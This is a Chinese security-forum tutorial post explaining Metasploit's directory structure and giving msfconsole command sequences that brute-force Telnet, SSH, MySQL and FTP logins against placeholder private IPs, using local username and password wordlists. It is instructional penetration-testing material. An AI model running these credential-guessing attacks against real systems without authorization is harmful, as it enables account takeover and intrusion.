安全矩阵

 找回密码
 立即注册
搜索
查看: 4605|回复: 0

[msfconsole进阶]关于目录和暴力破解

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-10-24 20:00:46 | 显示全部楼层 |阅读模式
原文链接:[msfconsole进阶]关于目录和暴力破解

Metasploit 目录结构
目录地址:/usr/share/metasploit-framework/
最重要的目录是 data,modules,scripts,tools,plugins

主目录结构 data 目录存放 meterpreter,exploits,wordlists 等。


meterpreter 是 msf 的攻击载荷,使用于后渗透阶段

exploits 里面则存放了许多的 cve 漏洞利用代码
wordlists 里面放的是字典文件
modules 目录metasploit 的核心目录了,存放着各个攻击模块。用于完成攻击。
scirpts 目录存放一些 msf 用到的脚本文件,如 meterpreter,ps,resource,shell等常见的脚本。
tools 目录存放各种可使用的工具
plugins 目录存放 msf 的各种插件

Metasploit 爆破篇爆破 TELNET
  1. use auxiliary/scanner/telnet/telnet_login
  2. set RHOSTS 192.168.1.1 #目标ip
  3. set STOP_ON_SUCCESS true #爆破成功就停止 msf
  4. set VERBOSE true #打印输出
  5. set USER_FILE /root/Desktop/username.txt
  6. set PASS_FILE /root/Desktop/password.txt
  7. run
复制代码

爆破 SSH
  1. use auxiliary/scanner/ssh/ssh_login
  2. set RHOSTS 192.168.1.1
  3. set STOP_ON_SUCCESS true #爆破成功就停止 msf
  4. set VERBOSE true #打印输出
  5. set USER_FILE /root/Desktop/username.txt
  6. set PASS_FILE /root/Desktop/password.txt
  7. set THREADS 50
  8. run
复制代码


爆破 MySQLps需目标主机开启3306端口和远程登录账号
  1. use auxiliary/scanner/mysql/mysql_login
  2. set RHOSTS 192.168.1.101
  3. set STOP_ON_SUCCESS true #爆破成功就停止 msf
  4. set VERBOSE true #打印输出
  5. set USER_FILE /root/Desktop/username.txt
  6. set PASS_FILE /root/Desktop/password.txt
  7. run
复制代码


爆破 FTP
  1. use auxiliary/scanner/ftp/ftp_login
  2. set RHOSTS 192.168.1.1
  3. set STOP_ON_SUCCESS true #爆破成功就停止
  4. set VERBOSE true #打印输出
  5. set USERNAME admin # frp账号
  6. set PASS_FILE /root/Desktop/password.txt
  7. run
复制代码




回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 11:41 , Processed in 0.012483 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表